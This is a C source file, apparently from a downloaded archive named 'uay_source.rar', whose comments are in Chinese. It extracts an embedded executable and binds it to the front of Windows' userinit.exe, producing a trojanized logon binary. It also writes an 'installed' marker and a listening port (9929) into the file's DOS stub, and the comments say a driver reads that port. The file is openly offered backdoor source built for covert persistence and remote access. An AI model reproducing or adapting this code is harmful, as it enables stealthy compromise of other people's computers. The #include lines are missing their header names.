www.pudn.com > uay_source.rar > u_combine_with_userinit.c
#include
#include
#include
#include
struct _MODIFY_DATA{
unsigned int finder;
unsigned int file_length;
}modify_dAtA = {0x12345678,0};
struct _SIGNANDPORT{
unsigned int sign;
unsigned int port;
}SignAndPort = {0xAABBCCDD,9929};
//--------------------------------------------------------------------
int
ReleAseTheExe(
char* towhere //这个参数还要作为CombineWithUserinit的第一个参数
);
int
CombineWithUserinit(
char* who,///like "C:\\WINDOWS\\System32\\bd_sys.exe" 被释放的文件地址
char* wheretoreleAse,//生成的userinit.exe的位置,名字不固定
int port
);
//--------------------------------------------------------------------
int
ReleAseTheExe(
char* towhere //这个参数还要作为CombineWithUserinit的第一个参数
)
{
HRSRC hRes = NULL;
DWORD dwResSize = 0;
HGLOBAL hResource = NULL;
LPVOID lpfResource = NULL;
HANDLE hFile = NULL;
DWORD dwWritten;
DWORD result;
hRes = FindResource(NULL,"u_userinit","exe");
if (hRes == NULL) {
return -1;
}
dwResSize = SizeofResource(NULL,hRes);
if (dwResSize == 0) {
return -1;
}
hResource = LoadResource(NULL,hRes);
if (hResource == NULL){
return -1;
}
lpfResource = LockResource(hResource);
if (lpfResource == NULL) {
return -1;
}
hFile = CreateFile(towhere,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if (hFile == NULL){
return -1;
}
result = WriteFile(hFile,lpfResource,dwResSize,&dwWritten,NULL);
if (result == 0){
return -1;
}
CloseHandle(hFile);
return 0;
}
//--------------------------------------------------------------------
int
CombineWithUserinit(
char* who,///like "C:\\WINDOWS\\System32\\bd_sys.exe" 被释放的文件地址
char* wheretoreleAse,//生成的userinit.exe的位置,名字不固定
int port
)
{
FILE* in1;
FILE* out;
FILE* in2;
int bytesin;
int totAlbytes = 0;
char pAth_userinit[MAX_PATH+1];
char* file1 = who;//"C:\\WINDOWS\\System32\\bd_sys.exe";
char* file2; //= "C:\\WINDOWS\\System32\\userinit.exe";
char* fileOut = wheretoreleAse;//"C:\\userinit.exe";
char* buff = NULL;
struct _stat ST;
unsigned int finder = 0x12345678;
unsigned int i,k;
SignAndPort.port = port;
GetSystemDirectory(pAth_userinit,MAX_PATH);
strcat(pAth_userinit,"\\userinit.exe");
file2 = pAth_userinit;
_stat(file1,&ST);
modify_dAtA.file_length = ST.st_size;
if(modify_dAtA.file_length == 0){
printf("error file_length == 0\n");
return -1;
}
buff = malloc(modify_dAtA.file_length);
if(buff == NULL){
printf("error mAlloc\n");
return -1;
}
in1 = fopen(file1,"rb");
if (in1 == NULL){
free(buff);
printf("error fopen\n");
return -1;
}
bytesin = fread(buff,1,modify_dAtA.file_length,in1);
fclose(in1);
if(bytesin != modify_dAtA.file_length ){
free(buff);
printf("error cAn not reAd the file1 All\n");
return -1;
}
//memcpy(buff+modify_dAtA.file_length,&modify_dAtA,sizeof(struct _MODIFY_DATA));
for (i = 0;i < modify_dAtA.file_length - sizeof(finder);i += sizeof(finder)){
for(k = 0;k < sizeof(finder);k++){
if(buff[i+k] != ((char*)&finder)[k]){
break;
}
}
if(k == sizeof(finder)){
memcpy(buff + i,&modify_dAtA,sizeof(struct _MODIFY_DATA));
break;
}
}
if(i >= modify_dAtA.file_length - sizeof(finder)){
free(buff);
printf("cAn not find modify_dAtA in %s\n",file1);
return -1;
}
if(_stat(file2,&ST) != 0 || ST.st_size == 0){
free(buff);
printf("file2 error\n");
return -1;
}
out = fopen(fileOut,"wb");
if (out == NULL){
free(buff);
printf("creAte %s fAiled\n",fileOut);
return -1;
}
//把file1 写入fileout
totAlbytes += fwrite(buff,1,bytesin,out);
in2 = fopen(file2,"rb");
if (in2 == NULL){
free(buff);
printf("open %s error",file2);
return -1;
}
//totAlbytes += fwrite(&(ST.st_size),sizeof(long),1,out);//sizeof(ST.st_size)
printf("ST.st_size: %d\n",ST.st_size);
//把file2写入fileout
while(bytesin = fread(buff,1,modify_dAtA.file_length,in2)){
totAlbytes += fwrite(buff,1,bytesin,out);
}
fclose(in2);
fclose(out);
free(buff);
//写入标记及端口号,,表示已经被安装,,且驱动要从这里读出端口号
//标记的位置在dosstub,文件开头90的位置
out = fopen(fileOut,"r+");
fseek(out,90,SEEK_SET);
totAlbytes += fwrite(&SignAndPort,1,sizeof(struct _SIGNANDPORT),out);
fclose(out);
return 0;
}
//--------------------------------------------------------------------